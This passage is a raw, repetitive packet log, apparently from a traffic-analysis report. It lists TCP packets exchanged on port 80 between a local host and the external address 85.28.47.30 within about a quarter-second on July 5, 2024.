                                                                Jul 5, 2024 04:36:07.377135992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377139091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377165079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377181053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377187967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377192020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377202034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377221107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377243042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377262115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377273083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377284050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377294064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377314091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377330065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377362013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377377033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377387047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377398014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377402067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377410889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377423048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377424002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377437115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377441883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377477884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377507925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377517939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377527952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377538919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377540112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377540112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377548933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377563953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377588034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377731085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377742052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377752066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377763033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377774954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377779007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377787113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377799988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377801895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377810001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377814054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377827883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377836943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377840042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377852917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377861023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377872944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377886057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377892017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377896070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377916098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377918959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377937078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377943039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377950907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377960920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377965927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377974033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377985954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377993107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.378019094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466149092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466176033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466185093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466212988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466229916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466233969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466245890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466254950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466268063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466278076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466280937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466304064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466311932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466461897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466470957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466512918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466588974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466598988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466605902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466634035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466643095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466656923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466667891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466677904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466698885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466726065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466785908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466830969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466842890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466872931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466881990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466891050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466901064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466927052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466937065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466945887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.466948032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.466984034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467097998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467137098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467144012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467153072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467175007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467180967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467185020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467196941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467196941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467205048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467210054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467223883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467231989 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467237949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467252016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467288017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467438936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467448950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467458963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467477083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467483044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467488050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467494965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467499018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467520952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467528105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467540979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467569113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467597961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467608929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467619896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467631102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467642069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467672110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467672110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467684984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467695951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.467713118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.467739105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468077898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468118906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468131065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468173027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468199968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468210936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468220949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468231916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468240976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468249083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468261003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468271971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468282938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468282938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468297958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468316078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468327999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468343019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468343019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468364000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468367100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468379021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468383074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468389988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468411922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468436956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468465090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468476057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468496084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468508959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468508959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468518019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468540907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468554020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468558073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468569040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468579054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468590021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468600035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468609095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468621969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468627930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468643904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468655109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468674898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468676090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468688965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468749046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468760967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468772888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468791962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468815088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468916893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468926907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468945980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468955994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468957901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468966961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468977928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468986988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.468987942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.468997955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469010115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469012976 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469021082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469028950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469053984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469080925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469114065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469124079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469135046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469145060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469153881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469156981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469171047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469171047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469183922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469193935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469194889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469204903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469214916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469214916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469233990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469244003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469244957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469257116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469266891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469269037 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469279051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469295025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469297886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469319105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469331980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469361067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469369888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469379902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469391108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469402075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469410896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469413996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469424009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469434023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469453096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469479084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469544888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469556093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469594002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469598055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469609976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469619989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469634056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469635963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469645023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469659090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469667912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469669104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469679117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469691992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469696045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469702005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.469716072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469734907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.469753027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558111906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558123112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558131933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558171034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558182001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558192968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558206081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558218002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558269024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558269024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558269024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558269024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558330059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558341026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558368921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558379889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558392048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558427095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.558954954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558965921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558976889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558989048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.558999062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559011936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559025049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559045076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559112072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559170961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559182882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559216976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559227943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559227943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559240103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559252024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559267998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559288025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559331894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559343100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559354067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559365034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559376955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559400082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559407949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559412956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559427977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559453964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559708118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559719086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559731007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559741974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559757948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559782028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559784889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559794903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559808016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559823990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559845924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559904099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559916019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559926987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559937954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559943914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559951067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559962988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.559971094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.559973001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560000896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560025930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560038090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560050011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560056925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560079098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.560096025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.560102940 CEST4973080192.168.2.485.28.47.30
